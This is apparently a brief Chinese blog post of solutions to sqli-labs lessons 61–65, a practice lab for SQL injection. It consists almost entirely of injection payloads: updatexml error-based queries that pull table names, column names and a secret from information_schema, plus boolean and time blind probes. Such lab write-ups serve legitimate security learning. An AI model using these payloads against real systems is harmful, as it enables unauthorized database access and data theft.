sqli-labs lesson61-65

  1. lesson-61

?id=1'
?id=1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)-- +
?id=1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='1al5puz81v'),0x7e),1)-- +
?id=1')) and updatexml(1,concat(0x7e,(select secret_CZT5 from challenges.1al5puz81v),0x7e),1)-- +

  1. lesson-62

时间或布尔盲注

?id=1') -- +
?id=1') and  ascii(substr(database(),1,1))=99%23

  1. lesson-63

时间或布尔盲注

?id=1'-- +
?id=1' and length(database())=10-- +

  1. lesson-64

时间或布尔盲注

?id=1))-- +
?id=1)) and length(database())=10-- +

  1. lesson-65

时间或布尔盲注

?id=1")
?id=1") and length(database())=10-- +
posted @ 2023-03-17 19:47  mushangqiujin  阅读(3)  评论(0)    收藏  举报  来源